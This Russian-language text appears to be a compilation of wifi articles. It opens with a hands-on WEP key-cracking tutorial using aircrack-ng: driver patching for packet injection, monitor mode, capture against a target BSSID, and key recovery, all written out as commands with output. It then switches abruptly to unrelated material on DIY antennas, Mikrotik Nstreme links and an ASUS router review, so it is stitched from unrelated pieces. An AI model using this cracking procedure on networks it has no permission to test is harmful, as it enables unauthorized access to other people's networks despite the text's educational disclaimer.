Протокол защиты беспроводных сетей WEP является самой "шумной" ошибкой проектирования средств защиты 20 века. Существует огромное количество методов атак, и утилит позволяющих за считанные минуты получить ключ шифрования, расшифровывать отдельные пакеты или внедрять фреймы в беспроводную сеть, защищенную с помощью WEP. В связи с этим сети, использующие этот протокол, практически не встречаются в корпоративном секторе.
В сети существует много матриалов по этому поводу. Попробуем их немного систематизировать, и описать практическое применение.
ВНИМАНИЕ!!! Вся информация изложеная в данной статье дана ТОЛЬКО в образовательных целях!!! Автор не несет никакой отвественности за вред причененный использованием материалов изложенных в данной статье!! Эксперементируйте только на своих сетях, а если решили попробовать на чужой, не забудте взять разрешение у хозяина сети! И помните: уголовный кодекс еще никто не отменял! :)
Здесь мы рассмотрим статический метод подбора ключа, с использованием набора утилит aircrack-ng.
Основным моментом является выбор "правильной" беспроводной карты и "правильных" (пропатченых) драйверов к ней. Так как не все карты одинаково хороши для нашей задачи.
Данный метод протестирован мной с использовнием PCI сетевых карт:
D-Link DWL-510 на чипсете RaLink RT2561/RT61 rev B. 802.11g
Senao на чипсете Atheros AR5212/AR5213
И нетбука Asus eeePC 701 4G, с картой Atheros AR242x 802.11abg на борту.
Существуют небольшие отличия при использованиии всех этих карт но сама суть остается таже.
В качестве платформы мы будем использовать Ubuntu Linux 8.04LTS Server Edition.
Для начала разберемся с патчами для драйверов наших карт.
И тут нас ждет приятный сюрприз. Для карт на чипсетах RaLink в Ubuntu используться драйвера rt2x00 котрые НЕ ТРЕБУЮТ никаких патчей! Они уже умеют делать injection сразу "из коробки"!
С Atheros чуть сложнее но тоже ничего страшного. Будем использовать драйвера madwifi-ng и патч к ним:
ifconfig ath0 down
ifconfig wifi0 down
svn -r 3925 checkout http://svn.madwifi-project.org/madwifi/trunk/ madwifi-ng
cd madwifi-ng
wget http://patches.aircrack-ng.org/madwifi-ng-r3925.patch
patch -N -p 0 -i madwifi-ng-r3925.patch
./scripts/madwifi-unload
make
make install
depmod -ae
modprobe ath_pci
Драйвера установлены и работают. Проверяем: lsmod .
Теперь установим aircrack-ng:
apt-get install aircrack-ng
Далее для карты Atheros AR5212/AR5213:
airmon-ng ath0 stop
airmon-ng start wifi0 10
Это переводит карту в режим монтиторинга на 10 канале WiFi.
Для карты на RaLink RT2561/RT61:
ifconfig wlan1 down
iwconfig wlan1 mode Monitor channel 10
Мониторим 10 канал.
Для карты Atheros AR242x используемой в Asus eeePC:
В Asus eeePC 701 4G используеться Atheros 242x которая по умолчанию не завелась в Ubuntu 8.04. Драйвера для нее берем тут:
http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-old.tar.bz2. Распаковываем, потом make\ make install \ make load. Загружаеться модуль ath5k. ath5k не требуют патчей и уже умеют инджектинг. Переводим карту в режим мониторинга:
ifconfig ath0 down
iwconfig ath0 mode Monitor channel 10
На этом различия для карт на разных чипсетах заканчиваються, дальнешие действия одинаковы для всех карт.
Делаем тест инджектинга:
aireplay-ng [имя интерфейса] -9
Кстати инджектинг может иногда и не работать но подбор ключа WEP при этом всеравно возможен.
Запускаем сбор пакетов:
airodump-ng -c 10 --bssid 00:AA:00:AA:00:AA -w packets ath0
где -c 10 - номер канала
--bssid 00:AA:00:AA:00:AA - BSSID нашей точки доступа
-w packet - пишем все в файл packets
-ath0 - интерфейс
Видим на экране как происходит сбор пакетов. Для подбора 64-битного ключа нам нужно гдето примерно 40000 пакетов, для 128-битного от 40000 до примерно 85000 пакетов в колонке DATA.
Теперь сам подбор:
aircrack-ng -z -b 00:AA:00:AA:00:AA packets*.cap
Через некоторое время наблюдаем чтото подобное:
Aircrack-ng 0.9
[00:03:06] Tested 674449 keys (got 96610 IVs)
[....]
KEY FOUND! [ 12:34:56:78:90 ]
Это и есть наш ключ WEP! :)
Ну конечно купить антенну порой не под силу даже не очень бедным, ибо цена часто зашкаливает за 100 у.е. Но ничего , если руки прямые то сие чудо можно изготовить и самому , очень полезен ресурс www.lan23.ru , настоятельно рекомендую . Основной силой этой антенны является ее простота геометрических форм при изготовлении и короткозамкнутость по постояному току ( бережет входые цепи точки доступа от статических разрядов електричества ) да и усиление антенны 20 дБ что весьма немало .
Оригинал статей по изготовлению нходится http://lan23.ru/wifi/fa20.html и здесь ttp://sterr.narod.ru/wifi/fa20.htm http://www.comptek.ru/box/wireless/technology/1453
Применение выносных антенн в WiFi диапазаноне наверное самый ответственный момент связанный с качеством, дальнобойностью и скоростьюв созданном линке . К сожалению 99 процентов начинающих "вайфайщиков" абсолютно не имеют базового образования в области антенно-фидерного хозяйства , хотя данный предмет преподается в вузах среднего и высшего технического образования на протяжении многих часов начитки . В этом аспекте я с благодарностью могу вспомнить своих преподавателей , в частности Седлецкого В.С., ибо данная наука дается очень тяжело особенно исходя из математических выкладок . И очень смешно порой слышать от очередного кулибина о фантастической антенне с коэфициентом усиления в 100 дБ !
Если перейти к реалиям жизни , то можно прийти к выводу , что создание антенн с коэфициентом усиления свыше 30 дБ просто нереально . Не стоит забывать что значения коефициента усиления в дБ имеет логарифмическую зависимость а не линейную , таким образом 20дБ это в 10 раз , а 40дБ - 100 раз ! Таким образом в принципе в любой простой одно-двух елементных и т.п. антеннах можно довольно просто увеличивать коэфициент усиления добавляя елементы (вибраторы) , однако не все так сладко , каждый елемент будет вносить не только дополнительное усиление , а и расстраивать нашу антенну ,которая по своей сути представляет собой резонансную систему с определенной добротностью которая затем выливается в коэфициент усиления и полосу пропускания , заставляя вводить согласующие елементы в конструкцию антенны в целом .
Таким образом на определенном этапе , когда колличество елементов антенны начинает превышать десяток елементов их количество просто перестает давать какие либо результаты . Не стоит забывать , что применяя антенны с усилением порядка 20-24 дБ мы получем очень низкую полосу частот , для которой эта антенна будет находиться в резонансе . Таким образом можно попасть в просак выстроив сие чудо на 1 канал диапазона и перейдя с оного расстроится скажем на 12 канале , для которого эта антенна может быть уже давно не в резонансе .
В общем и целом антенны можно разделить по диаграмме направленности (ДН) на направленные и круговые . В общем и целом конструкций направленных антенн есть достаточно большое количество (волновой канал , спиральные , параболические , панельные ) , чего нельзя сказать о круговых .
В WiFi диапазоне в качестве антенн с круговой ДН применяются практически только колинеарные антенны , которые имеют коефициент усиления порядка до 7-14 дБ . Причем 14 дБ является практически потолком для сией конструкции , которая в своем финише представляет собой визуально штырь длинной иногда до 1 метра .
Для повторения колинеарная антенна очень сложна в разрезе ее настройки и очень капризна . Направленных антенн есть великое множество и как правило повторение оных при соблюдении геометрических размеров не составляет труда . Габариты например паннельных антенн для диапазона 2.4 ГГц с коефициентом усиления порядка 20 дБ вписываются обычно в 200*400*30 мм или тому подобные .
Особое внимание следует уделить вопросу прямой видимости , поскольку данный диапазон волн абсолютно не склонен к огибанию препятствий , а затухание в строительных и естественных препятствиях (деревья и их листья) практически не дает возможности осуществлять связь внутри помещений через перестенки итп.итд. далее 50-100 метров . Не решает этих проблемм и наращивание мощности передатчика WiFi устройства . Теоретически для увеличения дальности в городской местности в 2 раза мощность передатчика приходится увеличивать всего того навсего в 10 раз ! (опыт применения диапазона 27 МГц в городских условиях , где дяди используют усилители ват по 100-300 Вт это при разрешенных 5 Вт!!). Однако применеие мощностей более 100 мВт при дальности линков до 5-10 км просто не оправдано и грозит только увеличеннием уровня шума в канале , что приведет к печальным последствиям вроде как и уровень сигнала отличный, а скорость линка почемуто подозрительно низкая .
Зачастую приходится убавлять мощность передатчика,балансируя на мощности сигнала и пропускной способности линка. Немаловажным условием является также свобода от препятствий в зоне Френнеля , что также не всегда получается , хотя вроде как точки установки антенн имееют оптическую видимость, но псередине пути имеется некое строение примерно такой же высоты (неплохо приобрести или взять в долг например подзорную трубу так надежней ...)
Немалой проблемой есть и коаксиальные кабеля , затухания в которых очень значительные . Так применив фидер длиной порядка 15-20 метров мы можем потерять все что приобрели с помощью применения выносной антенны. До недавних пор панацеей применения был коаксиал совкового и китайского производства RG-58 , однако данный фидер стоит применять в крайних случаях и на минимальных длинах , поскольку затухание в нем космическое , а 2.4 ГГц является по сути граничной частотой применения . Стоит обратить внимание на коаксиалы бренда Belden или аналогичные специально разработанные для данного диапазона . В последнее время мы применяли китайские кабеля на которых явным образом указывалась рабочая частота и стоимость не превышала 1 доллара за погонный метр .
Поскольку как правило разьемы на точках доступа имею разьем типа RS-SMA , который не позволяет напрямую призвести подпайку кабеля по причине большого диаметра (от 6 до 13 мм в диамтре обыно) , применяют так называемые Pigtail (переходник с одного типа разьема на дргой длиной примерно 30-50 см ) . Для прямой установки на кабель разьема типа RS-SMA необходм также и специальный обжимной инструмент , который стоит пару десятков долларов , народ наш правда изголяется с помощью плоскогубцев что не есть конечно равильно .
И снова RouterOS Mikrotik . Эта разностороняя ОС является по сути золотым топором при решении задач в сетях малого и среднего масштаба , хотя размер сети вещь относительная . Рассмотрение Mikrotik в разрезе WiFi роутера интесесно прежде всего наличием режима Nstreme и Nstreme2 .
Почитать о данных режимах работы можно на сайте www.mikrotik.com однако только на на английском языке , что не всем под силу . Приемущества протокола Nstreme:
1.Клиентский последовательный опрос. Последовательный опрос сокращает время для доступа, потому что плате не надо гарантировать каждый раз , что радиочастотное пространство является "свободным", когда необходимо передавать данные(механизм последовательного опроса заботится об этом)
2.Очень низкий протокол свыше рамок позволяющий супервысокие скорости передачи данных
По сути протокол Nstream в чистом виде нас не очень интересует , поскольку подразумевает линк пропускной споосбностью до 35 мбит и призван решить проблеммы больших таймаутов на длинных линках , думаю многие наблюдали громадные пинги на радиолинках при вобщем то вроде незагруженом радио канале , хотя конечно может комуто и хватит . Nstream Dual использует сразу 2 радиокарты с каждой из сторон линка при этом видно из рисунка , что одна работает на прием , другая на передачу . Таким образом практическая возможность линка по TCP возрастает до 75 мбит . Не стоит путать скорость физики служебных пакетов радиолинка и реальную пропускную способность по ТСР , которая в обычных устройствах стандарта G 54 мбит составляет по ТСР всего примерно 22 мбит при самых лучших раскладах. Для платформ RouteBOARD c разьемами miniPCI Mikrotik рекомендует использовать карточки WiFi типа R52 и R52H , которые внешне практически одинаковы , но имеют разную выходную мощность и оптимизированны как заверяет Mikrotik для работы с протоколом Nstream.
Однако хочется заметить , что ничего революционного окромя возможности работы на нестандартных частотах сверху и снизу диапазона в карточке R52 нет и подобную карточку , которая стоит немалых денег можно легко заменить на карточку производителя TL-WN660G , TL-WN560G производителя TP-LINK , если вы строите обысную точку доступа . Можно найти и других производителей , главное чтобы это был чипсет Atheros . Использование Nstream имеет и небольшие подводные камни , такие как ресурс процессора , поскольку он напрямую задействован в этом режиме . Mikrotik рекомендует использование процессора вообще так начиная с модели Celeron 700 и выше , однако платы RouterBOARD c таким процом обойдутся совсем недешево , например RB 433AH с 680 мегагерцовым процом всего навсего примерно 200-240 вечнозеленых едениц
Можно попробовать и RB433 c 300 мегагерцовым процом , внешний вид платы тот же , однако вы рискуете увидеть загрузку под 100 процентов . Неприятным является и то , что придется в Nsreme Dual использовать пару антенн с каждой стороны . Да построение линка Nsteream Dual совсем не дешевое удовольсвие , однако получение почти 100 мегабитного линка и невозможность другого технического решения с применением меди или оптоволокна делает его в некоторых случаях просто единственным решением . Стоит также заметить что в стоимость плат RouteBOARD уже включена стоимость програмного обеспечения (для L4 это примерно 70 доллров) .
Конечно , если вы решите заиметь просто точку доступа то для этого будет достаточно и более дешевых плат , например RB 411A стоит приблизительно 130 долларов и является наверное идеальным решением для беспроводной точки доспупа , обслуживающей клиентов .
Очень привлекательным является также и то , что платы поддерживают удаленное питание по свободным парам PoE , что позволяет установить точку доступа в непосредственной близости от антенны , по сути в одном корпусе , а питание подавать по витой паре на расстояние вплоть до 100 метров .
ASUS WL-500g Premium – это одна из самых удачных бепроводных точек SOHO сегмента . В корпусе этого устройства сосредоточены практически все функции, которые могут пригодиться при развертывании небольшой компьютерной сети, вплоть до организации на базе WL-500g Premium центра сетевых закачек, принт-сервера или публичного ftp-сервера. Этот роутер пришел на смену предыдущей модели, WL-500g Deluxe, которая была, без сомнения, очень успешной и завоевала широкую популярность. Очевидно, что требований к новой модели должно быть не меньше, а то и больше, чем к предыдущей. Если говорить о нововведениях, то их, по сравнению с моделью Deluxe, на первый взгляд не так уж и много: установлен более быстрый процессор, увеличен объем flash-памяти, а также добавлены новые функции – Download Master и EZSetup.
Параметр | Характеристика |
Стандарт беспроводной связи | IEEE 802.11b/g |
Стандарты шифрования | WEP, WPA, WPA2 |
Антенна | - Внутренняя IF (Inverted -F) антенна - Внешняя дипольная антенна |
Модуляция сигнала | OFDM, CCK, DQPSK, DBPSK |
Рабочая частота | 2.4 - 2.5 Ghz |
Номинальная скорость передачи данных | -802.11g: 6, 9, 12, 18, 24, 36, 48, 54Mbps -802.11b: 1, 2, 5.5, 11Mbps |
Мощность передатчика | -802.11g: 14~16dBm (at normal temp. range) -802.11b: 16~18dBm (at normal temp. range) |
Чувствительность | -74~-75dBm@54Mbps -87~-88dBm@11Mbps -95~-97dBm@1Mbps (at normal temp. range) |
Кол-во рабочих каналов | 11 for N.America, 14 Japan, 13 Europe(ETSI), 3 (non-overlapping) |
WAN | 1 порт RJ-45 (10/100 BaseT) Fast Ethernet 10/100 Mb/s с автораспознаванием crossover |
LAN | 4 порта RJ-45 (10/100 BaseT) Fast Ethernet 10/100 Mb/s с автораспознаванием crossover |
Остальные интерфейсы | 2 порта USB2.0 |
Питание | Внешний блок питания |
Размеры | 215 x 160 x 42 mm |
Дополнительные возможности | -Встроенный FTP сервер -Download Master -Встроенный UPnP сервер -EZ Setup -BroadRange -Afterburner |
В комплект поставки роутера входит:
Внешний вид девайса
Внутри роутера находятся две платы: основная и модуль WiFi. Последний представляет собой небольшую карту, которая вставляется на основной плате в слот miniPCI и позволяет заменить ее вслучае выхода из строя или обгрейде при переходе на другой стандарт .
Прежде чем обсуждать возможности web-итерфейса управляющей программы, мы просто обязаны затронуть тему самой управляющей программы, а точнее – того блока данных, который "зашивается" во флэш-память роутера. Так вот, прошивка (firmware) – это, пожалуй, самая актуальная для WL-500g Premium проблема. Нет, конечно, нельзя сказать, что дела безнадежно плохи. Если пользователю хватает тех настроек, которые имеются в официальной прошивке (именно о них речь пойдет ниже), то, скорее всего, он не заметит каких-либо серьезных недостатков, но беда в том, что многим пользователям имеющихся стандартных возможностей не хватает (и небезосновательно). К счастью, описываемое устройство позволяет заменить (перепрошить) стандартную микропрограмму на альтернативную, разработанную сторонними программистами-энтузиастами. Благодаря этому функциональность маршрутизатора может быть расширена.
Случаев, когда у обладателей ASUS WL-500g Premium может возникнуть желание искать альтернативные прошивки, много, но их подавляющее большинство (во всяком случае, для некоторых стран, таких как, например, Россия) сводится к проблеме с PPTP (VPN) соединением и одновременным роутингом трафика в локальную сеть. Возможностей стандартной прошивки не хватает, когда пользователь подключен к локальной сети провайдера со статическим (или динамическим) IP адресом, а доступ к Интернет получает от того же провайдера при помощи VPN (PPTP) соединения, с выдачей отдельного внешнего динамического IP адреса. Хотя, конечно, это далеко не единственный повод, по которому пользователь может прибегнуть к неофициальным прошивкам. Например, некоторые микропрограммы дают возможность общаться с роутером через Telnet или SSH. А в этом случае открываются практически бесконечные (ограниченные только характеристиками аппаратной части) возможности – это и изменение любых параметров прошивки, установка новых приложений на роутер, написание своих сценариев и т.д., и т.п.Существует масса альтернативных прошивок к данной модели одна из которых называется OpenWRT. В этой прошивке реализован доступ к роутеру через Telnet, ну и, разумеется, имеются средства для решения проблем с VPN. Ну, и, наконец, альтернативная прошивка написана энтузиастом, широко известным в узких кругах, как Oleg. Он выпускает собственные версии прошивок для некоторых моделей сетевого оборудования ASUS, включая и WL-500g Premium , он выкладывает на своем форуме AsusForum многочисленные версии прошивок для этой модели роутера. Прошивки от Олега зарекомендовали себя с лучшей стороны , с веб браузера они правда не предоставляют всех возможностей , в том числе отрезана возможность закачек торрентов как таковых вообще . А вот по SSH Telnet можно творить чудеса , внутри Linux со всеми вытекающими возможностями установки , модификации, настройки ПО. Все это рассматривается на форуме у Олега.
Если говорить о производительности роутера, то основным критерием ее оценки является, несомненно, пропускная способность сетевых портов. В нашем же случае, к этому еще можно прибавить скорость работы встроенного FTP-сервера, а также скорость и дальность охвата беспроводного интерфейса. Так как это первый роутер подобного класса, оказавшийся в нашей лаборатории, и сравнивать результаты его тестов нам пока не с чем, мы будем комментировать все результаты исключительно субъективно.
Для тестирования скоростей сетевых соединений мы использовали известную программу IxChariot. Измерения проводились по простой схеме: нами были созданы несколько соединений "точка-точка", которые иллюстрировали бы разные варианты сетевых соединений.
Итак, для всех тестов нами было использовано следующее оборудование:
Ниже мы приводим графики из IxChariot, полученные после применения сценария High Performance Throughput. Прокачка внутри локальной сети LAN-LAN
Прокачка из внешней сети во внутреннюю WAN-LAN:
Прокачка во внутренней сети с использованием WiFi интерфейса (в непосредственной близости от роутера). Измерялась скорость между системой, подключенной по кабелю и системой, с которой было установлено беспроводное соединение с использованием WPA шифрования:
Результаты получились впечатляющими, особенно с проводным соединением – они практически равны максимальной теоретической пропускной способности канала 100 Мбит/сек. Пропускная способность беспроводного интерфейса тоже находится на приемлемом уровне. Особенно, если учесть, что тут результат зависит в значительной мере от WiFi-модуля и антенны клиентского устройства.
Данный роутер очень неплохо себя зарекомендовал , правда их было несколько ревизий , в некоторых из них была проблемма с чувствительностью приемного тракта , которая решалась заменой резистора на радиокарте . К недостаткам применения данного роутера можно отнести приличное енергопотребление и отсутствие возможности удаленного питания . Както раз подвел и внешний импульсный источник , закипел выходной конденсатор фильтра , расположенный в непосредственной близости от радиатора выпрямительного диода .